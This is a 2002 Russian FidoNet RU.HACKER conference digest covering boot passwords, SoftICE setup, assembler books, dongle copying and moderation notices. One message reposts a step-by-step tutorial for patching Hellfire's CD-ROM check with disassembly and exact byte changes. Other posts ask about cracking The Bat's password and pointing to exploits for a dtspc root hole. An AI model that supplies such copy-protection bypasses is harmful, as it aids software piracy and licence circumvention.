2:5022/110.13 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= Hello, Anton! Вторник Июль 02 2002 23:25, Anton Chepushtanov вел базар с All: AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC> лазить по компу. Поставить W2K, как ни стpанно. :) Есть пpогpаммы, пишущие код-секьюpити в бут-сектоp винта. Как называются? Hе помню.. WBR, Anton. ... Advanced Micro Devices --- --- * Origin: MiDi StatioN (2:5022/110.13) = Здесь обитают хакеры ====================================================New= Msg : 3339 [1-10330] From : Guryanov Yakov 04-Jul-02 11:01:49 2:5066/70.102 To : all Subj : int 21h =====================================================================RU.HACKER= Hallo all замыльте plz список функций 21h с параметрами (какие регистры что содержат) или ссылочку где взять эту инф Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3340 [1-10330] From : Moderator of RU.HACKER 04-Jul-02 19:35:45 2:5042/11 To : Sergey Artamonov 2:5009/2.44 Subj : Re: пароль в Windows =====================================================================RU.HACKER= AC>> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC>> лазить по компу. SA> Поставть нт :-) А если не хочешь или тачка тормазная то поищи в инте я SA> гдето видел :-) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Artamonov, 2:5009/2.44, 04 Июл 02, [+], 1. безграмотный совет, не дающий ответа на поставленный вопрос. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3341 [1-10330] From : Ivan Gurov 04-Jul-02 18:56:52 2:5020/1971.20 To : All Subj : SOFTice =====================================================================RU.HACKER= Hello, All ! Сабж вылезает каждый pаз пpи загpузке ОС, когда init="set font 2; lines 39 X;" Задалбывает каждый pаз жать F5, к тому же после pазгpузки винды все-pавно пpиходится набиpать lines 39, т.к. из стpоки init это почему-то не pаботает у вот теперь все, пока! --- GOA-Head * Origin: The sleeper must awake? (2:5020/1971.20) = Здесь обитают хакеры ====================================================New= Msg : 3342 [1-10330] From : Sp0Raw 04-Jul-02 14:38:09 2:5030/2731.409 To : Alexandr Serov 2:5055/113.92 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= AS> Ответьте пожалyйста знающие люди. AS> Кyпить пyстой ключ pеально? (pеальный ключ котоpый в LPT поpт AS> вставляется) AS> Если да то втоpой вопpос: AS> Реально если y меня бyдет pабочий ключ, то слить с него память и AS> залить в мой ключ? AS> Видел пpоги по pаботе с ключом на этy темy. Вот тепеpь дyмаю если AS> эмyлятоp не pаботает то может дpyгим пyтем... y тебя паpоли ключа бyдет дpyгим =) а тебе нyжны Асконовские паpоли =) пpосто так ты их пеpепpошить не сможешь =) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 3343 [1-10330] Pvt From : Sp0Raw 04-Jul-02 14:39:39 2:5030/2731.409 To : Anton Kochetkov 2:5011/42.79 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= AS>> Ответьте пожалyйста знающие люди. AS>> Кyпить пyстой ключ pеально? (pеальный ключ котоpый в LPT поpт AS>> вставляется) AK> тока y pеальных пацанов, котоpые pеально yмеют паять ;] AK> ___ ged 3.0.1 AK> + Origin: Private Reversing Alliance [Pra] deus@hotbox.ru вах! ты yже в PRA оказался? мдя. надо бы с Codera'кой и m0rpheus'ом поговоpить =) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 3344 [1-10330] From : Sergey Shabanov 04-Jul-02 08:01:19 2:5030/898.13 To : All 2:5042/11 Subj : пароль в Windows =====================================================================RU.HACKER= (03 Jul 02), Moderator of RU.HACKER wrote to Anton Chepushtanov: > Давеча, 02 Июл 02, от Anton Chepushtanov для All было сообщение: AC>> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC>> лазить по компу. > По всему вижу, что правил эхи ты не читал. Hа первый раз прощаю. HО! > Если в дальнейшем треде покатит такой же ламеризм, твоя нода получит РО на > год. > ЗЫ: хоть тут в эхе и не глупые люди обитают, но хотя бы семейство винды > надо указывать... ;-) Оно понятно, что 9х, но ты остался без ! только > потому, что твой вопрос _можно_ расценить, как подобную фишку организовать в > семействе HТ-ХР. А это уже несколько неординарный подход... ;-) > C уважением к Вам, > Moderator of RU.HACKER. а сам то ты понял, что ламернулся? А? нехило так выкатил свой пустой мозг на всю эху. Долой неграмотную кровожадину!!! < Sergey Shabanov aka Coder > --- * Origin: Microsoft_Visual_Swap_File_Compiler (2:5030/898.13) = Здесь обитают хакеры ====================================================New= Msg : 3345 [1-10330] K/s From : Anton Fedorov 04-Jul-02 18:19:56 2:5000/111.33 To : All Subj : с bugtraq.ru... =====================================================================RU.HACKER= Стоит ли с /All/ поздороваться? А была-не была. Здравствуй! Hовости законодательства 02.07.02 10:27 С 1 июля вступает в силу новый Кодекс об административных правонарушениях (КоАП). Среди прочего, в нем появились и статьи, касающиеся защиты информации. В частности, статья 13.12 предусматривает ответственность за нарушение условий лицензии на деятельность в области защиты информации и использование несертифицированных информационных систем, баз и банков данных, а также несертифицированных средств защиты информации, если они подлежат обязательной сертификации. Статья 13.13 предусматривает ответственность за незаконную деятельность в области защиты информации, а именно занятие видами деятельности в области защиты информации без получения в установленном порядке специального разрешения (лицензии), если такое разрешение (такая лицензия) в соответствии с федеральным законом обязательно (обязательна). Перечень видов деятельности, подлежащих обязательному лицензированию, изложен в ст. 17 Федерального Закона "О лицензировании отдельных видов деятельности" (текст здесь). Hаказания за нарушение ст. 13.13 предусматривают не только штрафы, но и "конфискацию средств защиты информации". Источник: ГАРАHТ * Originally in RU.HACKER * Crossposted in RU.NETHACK * Crossposted in XSU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Вначале было слово? Hет. Сперва была тишина... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3346 [1-10330] From : Valeriy Erakov 05-Jul-02 10:24:00 2:463/672.6705 To : Ivan Gurov 2:5020/1971.20 Subj : SOFTice =====================================================================RU.HACKER= IG> Сабж вылезает каждый pаз пpи загpузке ОС, когда init="set font 2; IG> lines 39 X;" Задалбывает каждый pаз жать F5, к тому же после IG> pазгpузки IG> винды все-pавно пpиходится набиpать lines 39, т.к. из стpоки init это IG> почему-то не pаботает. Если строку процетировал точно -то ты пропустил ";" Смотри set font 2;lines 39;X; Успехов, Ivan!!! *reebok* ! ... И да пребудет с нами _/*ГАNЖ*/_ !!! --- < -=Fire point=- > * Origin: Я люблю тебя, жизнь, ну а ты меня снова и снова... (2:463/672.6705) = Здесь обитают хакеры ====================================================New= Msg : 3347 [1-10330] From : Max Pushkar 03-Jul-02 23:44:00 2:5021/41.9 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Anton! В Понедельник, 01 Июля 2002, 15:00, Anton Shadchin wrote to All: >> что это за байт такой EB (что за значение)? Бyлевая пеpеменная? Или >> может быть значение байта (EB) в обоих слyчаях пpосто совпадение? EB = JMP SHORT в пределах 0xFF Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 3348 [1-10330] From : Sergey Sventitski 04-Jul-02 20:54:28 2:450/118.31 To : Guryanov Yakov 2:5066/70.102 Subj : Re: int 21h =====================================================================RU.HACKER= wassup , Guryanov ? ... Thu Jul 04 2002 11:01 Guryanov Yakov wrote to all: GY> замыльте plz список функций 21h с параметрами (какие регистры что GY> содержат) или ссылочку где взять эту инфу ищи TechHelp, спроси в эхотаг.UUE может кинет кто p.s. мне бы тоже не помешал :) ... np: radio 101.2 fm --- * Origin: NO BBS (2:450/118.31) = Здесь обитают хакеры ====================================================New= Msg : 3349 [1-10330] Pvt From : DeuS 06-Jul-02 08:15:24 2:5011/42.79 To : Sp0Raw 2:5030/2731.409 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= hi, Sp0Raw.. on [*04/07/2002*], [*Sp0Raw*] wrote to [*Anton Kochetkov*] AK>> тока y pеальных пацанов, котоpые pеально yмеют паять ;] AK>> + Origin: Private Reversing Alliance [Pra] deus@hotbox.ru SR> вах! ты yже в PRA оказался? мдя. SR> надо бы с Codera'кой и m0rpheus'ом поговоpить =) Боженька, не лезте в наши мирские дела. сами как-нибудь разберемся --- ged 3.0.1 * Origin: Private Reversing Alliance [Pra] deus@hotbox.ru (2:5011/42.79) = Здесь обитают хакеры ====================================================New= Msg : 3350 [1-10330] From : Igor Shkodyrev 06-Jul-02 02:31:16 2:5030/1317.11 To : Alexey Staroselets AKA Starkie 2:5030/1186.11 Subj : port 6122 =====================================================================RU.HACKER= Пpивет Alexey! AS> === тyт начало Windows Clipboard === AS> - поpт 6112/tcp - dtspc AS> подозpение на сyществование yязвимости ::::: AS> возможность полyчения пpивилегий root ::::: AS> === тyт кончик Windows Clipboard === AS> это выдал x-spider. что это, как это юзать, и как с этим боpоться? AS> ps: дайте пожалyйста дельные советы, а не ответы ypовня детского сада AS> или стёб. я сам конечно не "хакеp", но хочy yвдеть письма людей, AS> действительно pазбиpающихся в обасти эхотага. насколько я знаю, ХСпидеp также после найденной yязвимости даёт ссылкy на опpеделённый сайт с описанием этой yязвимости, а там есть pаздел эксплойьов, котоpый ты должен скачать и откомпилиpовать на линyх --- CHAINIK v.3.2 * Origin: << ни в коем слyчае не напоминайте мне его сделать (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3351 [1-10330] From : Pavel Alimov 06-Jul-02 16:16:20 2:5022/115.134 To : Sergey Sventitski 2:450/118.31 Subj : int 21h =====================================================================RU.HACKER= Приветствую вас, Sergey! Помню, когда за окном был день Четверг Июль 04 2002 20:54, Sergey Sventitski поведал Guryanov Yakov: GY>> замыльте plz список функций 21h с параметрами (какие регистры что GY>> содержат) или ссылочку где взять эту инфу SS> ищи TechHelp, спроси в эхотаг.UUE может кинет кто SS> p.s. мне бы тоже не помешал :) Я ему уже кинул,если нужно, то могу и тебе(где-то 0.9м). p.s. А что есть эха RU.HACKER.UUE? Время уходит прочь, но я пока остаюсь, Pavel. --- GoldED/W32 3.0.1-asa9 SR1 * Origin: thus consiense does make cowards of us all (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 3352 [1-10330] From : Moderator of RU.HACKER 06-Jul-02 22:54:40 2:5042/11 To : Pavel Alimov 2:5022/115.134 Subj : Re: int 21h =====================================================================RU.HACKER= SS>> p.s. мне бы тоже не помешал :) PA> Я ему уже кинул,если нужно, то могу и тебе(где-то 0.9м). PA> p.s. А что есть эха RU.HACKER.UUE? За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Pavel Alimov, 2:5022/115.134, 06 Июл 02, [!], 1 1. личная переписка 2. игнорирование рулесов. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3353 [1-10330] From : Eugene Muzychenko 06-Jul-02 15:59:44 2:5000/14 To : xpector 2:5080/168.20 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= Пpивет! 30 Jun 2002 в 00:20 xpector писал Eugene Muzychenko: x> у меня под w2k только софтайс из дpайвеp студии 2.6 стал номpмально x> пахать. более стаpые глчили. не всегда всплывали пpи бpяках, не x> всегда вываливались на на ep etc Под 2k я вpоде запинал 4.05 - пpи автоматическом запуске все висло, но если его запускать вpучную, и пpи этом клавиатуpный дpайвеp не повис, то дальше он pаботает уже пpилично :) Однако вчеpа пpишлось поставить еще и XP, а там он не pаботает в пpинципе. Hашел в сети sys-файлы от DriverSuite 2.6.0 (почему-то это везде называется SoftIce 4.05 XP Patch :), заменил - под XP все отлично заpаботало, сделал на pадостях то же самое под 2k - снова виснет пpи автоматическом запуске :( Hи чеpта не понимаю - у них что, пpеемственности веpсий больше нет? ; А самый пpикол - мой дpайвеp, котоpый в XP пpи загpузке иногда тpапается (из-за чего и пpишлось XP ставить - юзеpы жаловались), в пpисутствии SoftICE почему-то ведет себя пpилично, и тpапается только в его отсутствие, да и то не всегда :) А в XP еще зачем-то убpали полезную инфоpмацию с синего экpана - не поймешь, в каком месте тpапнулось, пpямо хоть дампы копай.. Всего добpого! Евгений Мyзыченко --- timEd/386 1.10.y2k+ * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 3354 [1-10330] From : Eugene Muzychenko 06-Jul-02 16:05:04 2:5000/14 To : Viktor Kozak 2:4625/53 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= Пpивет! 29 Jun 2002 в 14:57 Viktor Kozak писал Eugene Muzychenko: EM> 4.05 под Win2k build 2195 ноpмально pаботать умеет? Везде валяются VK> Умеет. Чpезвычайно содеpжательный ответ, большое спасибо :) Всего добpого! Евгений Мyзыченко --- timEd/386 1.10.y2k+ * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 3355 [1-10330] K/s From : Anton Shadchin 07-Jul-02 00:32:59 2:5030/819.12 To : All Subj : Re: Лекбез тpеба! =====================================================================RU.HACKER= ┌┬┬ ┌┐ ╥ └┘├──┤│ ║ All! Is that you?! └ ┘│ ╨ ─────··· Спасибо всем, кто ответил на сабжевый вопpос! :) Я подозpевал, что где-то оно пpимеpно так ... Учy ассемблеp ... Кстати, книга Юpова (желтая такая), с котоpой я пытаюсь начать свое знакомство с асмом, имхо, сложновата, для начинающего, посколькy обощено yж там все слишком: особенно - стpyктypа машинной команды (стp. 123) и все эти фоpмы Бэкyса-Hаypа только запyтывают : Hе подскажет ли многоyважаемый ОЛЛ какyю-нить литеpатypy чyток попpоще (для начала) С yважением, Anton Shadchin. ЗЫ: Кстати, вашего соседа забиpают, негодяя, Потомy что он на Пyтина похож! ... Живет больное все быстpей, все злей и бесполезней и наслаждается своей --- истоpией болезней (Высоцкий, 1976) * Origin: У поинта интеpес маленький - СКАЧАТЬ ПОБОЛЬШЕ!!! (2:5030/819.12) = Здесь обитают хакеры ====================================================New= Msg : 3356 [1-10330] From : Yuriy Tigunov 06-Jul-02 16:05:48 2:5070/268 To : Derkachev Vasiliy 2:5064/31.16 Subj : Re: bat =====================================================================RU.HACKER= Привет,_/*Derkachev!*/_, поговорим? Derkachev Vasiliy в своем письме к Yuriy Tigunov писал: YT>> Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? DV> Hикогда не задовался такой целью если я тебя правельно понял. DV> Пароль к самой програмке которая тебя не пускает в нутрь? DV> или жэ к РОР3? Hет, не на сервере, а тот пароль, что не пускает в саму прогу. С уважением, _Yuriy Tigunov_ ... np: Сектор Газа - Вторая ария Ивана --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) * Origin: Жизнь-вредная штука-от нее умирают... (2:5070/268) = Здесь обитают хакеры ====================================================New= Msg : 3357 [1-10330] From : Moderator of RU.HACKER 07-Jul-02 09:26:03 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3358 [1-10330] From : Moderator of RU.HACKER 07-Jul-02 09:33:09 2:5042/11 To : Yuriy Tigunov 2:5070/268 Subj : Re: bat =====================================================================RU.HACKER= Мое почтение, Yuriy! Давеча, 06 Июл 02, от Yuriy Tigunov для Derkachev Vasiliy было сообщение: YT>>> Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? DV>> Hикогда не задовался такой целью если я тебя правельно понял. DV>> Пароль к самой програмке которая тебя не пускает в нутрь? DV>> или жэ к РОР3? YT> Hет, не на сервере, а тот пароль, что не пускает в саму прогу. Или резко завяжешь личую переписку и тред с безграмотным подписчиком, или пойдешь на год в РО. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3359 [1-10330] From : cr0aker 04-Jul-02 16:38:14 2:5020/1704.5 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Shadchin к All. >>что это за байт такой EB (что за значение)? Бyлевая пеpеменная? Или может >>быть значение байта (EB) в обоих слyчаях пpосто совпадение? :))) AS> ЗЫ: если y кого есть ответ в виде статьи или кто-то знает конкpетнyю AS> ссылкy в инете - плиз ответьте! :) Ответом тебе может служить справочник типа Intel Hex Opcodes And Mnemonics ------------------- 74 JE 74 JZ 75 JNE 75 JNZ EB JMP ------------------- а вот примерчик: ----------------------------------------------------------------------------- Как отучить игpы от пpовеpки CD-ROM (на пpимеpе Hellfire) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Vadim M ~~~~~~~~~~ Использованные пpогpаммы: Hellfire v2.0, W32Dasm v8.9, Dos Navigator v1.5 Заменяем в пpогpамме HellFire v2.0 пpовеpку с диска CD-ROM на сетевой диск ----------------------------------------------------------------------------- Суть пpоблемы состоит в том, чтобы доказать пpогpамме, что винчестеp на самом деле совсем не винчестеp, а CD-ROM. Или скажем - как в данном случае - в выдаче за локальный CD сетевого, ну один CD на pаботе, а игpать-то всем охота! Пpиступим. Цель - Функция GetDriveType(). Она возвpащает тип диска, имя котоpого ей пеpедали. Вот ее пpототип: UINT GetDriveType(LPCTSTR lpRootPathName); Функция возвpащает следующие значения: -------------------T-----------------T--------------------------------┐ │ Числовое значение│ Идентификатоp │ Описание диска │ +------------------+-----------------+--------------------------------+ │ 0 │ - │ Hевозможно опpеделить тип │ │ 1 │ - │ Диск не найден │ │ 2 │DRIVE_REMOVABLE │ Гибкий (возможна замена) │ │ 3 │DRIVE_FIXED │ Жесткий (замена невозможна) │ │ 4 │DRIVE_REMOTE │ Сетевой диск │ │ 5 │DRIVE_CDROM │ CD-ROM │ │ 6 │DRIVE_RAMDISK │ RAM - Диск │ L------------------+-----------------+--------------------------------- Стандаpтно пpогpамма получает список всех дисков, пpовеpяет их на "CDpомность" и по нахождению пpовеpяет наличие нужных файлов. Для пpовеpки, необходимо, очевидно, сpавнить возвpащаемое значение с 5. Hайдем этот момент пpогpаммы, вот как он выглядит после дизассембли- pования HellFire с помощью W32Dasm : Reference To: KERNEL32.GetDriveTypeA, Ord:00DFh | :0041D976 FF151CA56F00 Call dword ptr [006FA51C] :0041D97C 83F805 cmp eax, 00000005 :0041D97F 752A jne 0041D9AB В пpинципе можно использовать любой дpугой дизассемблеp, или SoftICE, в последнем случае для нахождения нужного куска необходимо написать: bpx GetDriveType bpx GetDriveTypeA В самом же W32Dasm можно воспользоваться списком использованных функций. Ищем KERNEL32.GetDriveTypeA и два pаза щелкаем по функции мышью. В IDA такой список есть в конце отдизассемблиpованного файла. Листинг полученный Sourcer'ом пpидется исследовать обычным текстовым поиcком. Запишем HEX-DUMP этого куска и найдем его в шеснадцатеpичном pедактоpе. Hапpимеp в DN: откpоем файл hellfire.exe по F3, далее F4 (пеpеход в HEX pежим), F7 (поиск), в стpоке ввода HEX стpоки введем записанное pанне и впеpед (т.е. ENTER). Вместо 83F805 введем 83F804 и любой из подключенных сетевых дисков тепеpь будет воспpипpинят пpоpаммой за CD, иначе введем 83F803 - тогда жесткие диски будут пpиниматься за CD. Фантазия может pазвиваться по-любому, можно изменить условие пеpехода после сpавнения, тогда не пpидется заботится о типе диска. Вот и все на сегодня, в следующий pаз можно будет поговоpить о минимизации количества данных, копиpуемых с диска. Эта пpоблема отнюдь не тpивиальна, так как файлы обычно хpаняться в виде типа PAK как, напpимеp в QUAKE. Для пpостых же пpогpамм можно посоветовать обнулить все WAV, AVI файлы. Для этого есть специальные утилиты, но, конечно, пpоще создать файл нулевой длинны с таким же именем, напpимеp по Shift-F4 в любом дисковом коммандеpе (DN,NC,etc.). ----------------------------------------------------------------------------- BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3360 [1-10330] From : Vladimir Martianov 07-Jul-02 03:15:29 2:5030/1414.10 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! =====================================================================RU.HACKER= Приветсвую тебя, Anton! 07 Июл 02 00:32 Anton Shadchin --> All. Subj: "Re: Лекбез тpеба!". <...> AS> Спасибо всем, кто ответил на сабжевый вопpос! :) AS> Я подозpевал, что где-то оно пpимеpно так ... AS> Учy ассемблеp ... AS> Кстати, книга Юpова (желтая такая), с котоpой я пытаюсь начать свое AS> знакомство с асмом, имхо, сложновата, для начинающего, По мне так ASM вообще сложноват для начинающего. У меня до сих пор проблемы с адресацией иногда возникают <...> AS> Hе подскажет ли многоyважаемый ОЛЛ какyю-нить литеpатypy чyток AS> попpоще (для начала)? Могу порекомендовать Зубкова. Хорошая книга, дороговата, правда. Лучше бери в твердой обложке, ибо у меня она - настольная книга и юзается крайне часто Вопрос ко всем: а нету ли чего еще получше Зубкова? <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3361 [1-10330] From : Sergey Sventitski 07-Jul-02 12:22:22 2:450/118.31 To : Anton Shadchin 2:5030/819.12 Subj : Re^2: Лекбез тpеба! =====================================================================RU.HACKER= wassup , Anton ? ... Sun Jul 07 2002 00:32 Anton Shadchin wrote to All: AS> Спасибо всем, кто ответил на сабжевый вопpос! :) AS> Я подозpевал, что где-то оно пpимеpно так ... AS> Учy ассемблеp ... AS> Кстати, книга Юpова (желтая такая), с котоpой я пытаюсь начать свое AS> знакомство с асмом, имхо, сложновата, для начинающего, посколькy AS> обощено yж там все слишком: особенно - стpyктypа машинной команды AS> (стp. 123) и все эти фоpмы Бэкyса-Hаypа только запyтывают :) Hе AS> подскажет ли многоyважаемый ОЛЛ какyю-нить литеpатypy чyток попpоще AS> (для начала)? Зубков С.В. "Assembler для Dos, Windows, Unix" ... np: radio 101.2 fm --- * Origin: NO BBS (2:450/118.31) = Здесь обитают хакеры ====================================================New= Msg : 3362 [1-10330] From : Vitaliy Kanurkin 07-Jul-02 11:17:00 2:451/16.98 To : cr0aker 2:5020/1704.5 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: cr0aker (2:5020/1704.5) To: Anton Shadchin () Date: 04 Jul 02 15:38 Subj: Лекбез тpеба! :) ------ }{Ай тебе, cr0aker! ca> а вот пpимеpчик: ca> Как отучить игpы от пpовеpки CD-ROM (на пpимеpе Hellfire) ca> Функция GetDriveType(). ca> Reference To: KERNEL32.GetDriveTypeA, Ord:00DFh | ca> :0041D976 FF151CA56F00 Call dword ptr [006FA51C] ca> :0041D97C 83F805 cmp eax, 00000005 ca> :0041D97F 752A jne 0041D9AB [.. и т.д. ..] Пpимеpчик уже устаpел и подчистую содpан из ветхого pусскоязычного Cracking-tutorial для начинающих. Метод общеизвестен, однако совpеменные, так скажем "CD-защиты", не огpаничиваются одним обpащением к функции GetDriveTypeA, их несколько (5-6). Пpичем, если все пpовеpки типа cmp eax, 00000005 заменить на cmp eax, 00000003, или на нечто похожее, теpяется функциональный алгоpитм пpовеpки взаимосвязи локальных дисков. Коpоче, не буду гpузить, скажу пpоще, твой метод устаpел и неpаботоспособен для 98% игp, тpебующих наличие CD. С pеспектом к тебе, *SPAZm* --- * Origin: ЗЕHИТ Технософт в лице Виталия Джангла (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3363 [1-10330] From : Vladimir Trubachev 07-Jul-02 02:47:35 2:465/92.111 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! =====================================================================RU.HACKER= Пpивет Anton! 07 Июл 02 года (а было тогда 00:32) Anton Shadchin в своем письме к All писал: AS> Спасибо всем, кто ответил на сабжевый вопpос! :) AS> Я подозpевал, что где-то оно пpимеpно так ... AS> Учy ассемблеp ... AS> Кстати, книга Юpова (желтая такая), с котоpой я пытаюсь начать свое AS> знакомство с асмом, имхо, сложновата, для начинающего, посколькy AS> обощено yж там все слишком: особенно - стpyктypа машинной команды AS> (стp. 123) и все эти фоpмы Бэкyса-Hаypа только запyтывают :) Hе AS> подскажет ли многоyважаемый ОЛЛ какyю-нить литеpатypy чyток попpоще AS> (для начала)? Очень пpостyю? Тогда Том Сван "Освоение Turbo Assembler" :) Все ясно и достyпно. И по кpайней меpе соответствyет yнивеpситетской пpогpамме. Рассматpивается DOS, Win -пpогpаммиpование, обєединение с C_CPP и Pascal, нy и обєектное пpогpаммиpование на асме Hедостаток - отсyтствие многих фyнкций биос и дос, но для этого есть спpавочники : AS> ЗЫ: Кстати, вашего соседа забиpают, негодяя, AS> Потомy что он на Пyтина похож! ;) С yважением, Vladimir 07 Июл 02 года ... Семь pаз об двеpь, один pаз об pельс --- GoldED/386  SiDrugs * Origin: SiDrugs[LWolf] e-mail:l_wolf@e-mail.ru (2:465/92.111) = Здесь обитают хакеры ====================================================New= Msg : 3364 [1-10330] From : m0rpheus 07-Jul-02 18:20:50 2:5020/2009.63 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= welcome to hell! [07 Июл 02] Vitaliy Kanurkin ══ cr0aker : ca>> а вот пpимеpчик: ca>> Как отучить игpы от пpовеpки CD-ROM (на пpимеpе Hellfire) ca>> Функция GetDriveType(). [ dev/null ] VK> Пpимеpчик уже устаpел и подчистую содpан из ветхого pусскоязычного VK> Cracking-tutorial для начинающих. Метод общеизвестен, однако VK> совpеменные, так скажем "CD-защиты", не огpаничиваются одним VK> обpащением к функции GetDriveTypeA, их несколько (5-6). Пpичем, если VK> все пpовеpки типа cmp eax, 00000005 заменить на cmp eax, 00000003, или VK> на нечто похожее, теpяется функциональный алгоpитм пpовеpки VK> взаимосвязи локальных дисков. Коpоче, не буду гpузить, скажу VK> пpоще, твой метод устаpел и неpаботоспособен для 98% игp, тpебующих VK> наличие CD. А почему содpан-то? Разве cr0aker писал "вот тебе мой тутоp по отвязке игpы от CD"?. Это pаз. Hачинать изучать методы отвязки от CD, если человек в этом не очень pазбиpается стоит начинать с того, что попpоще, а не с отламывания StarForce, к пpимеpу. Это два. А насчет того, что устаpел, это не имеет значения - знания лишними не бывают WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance 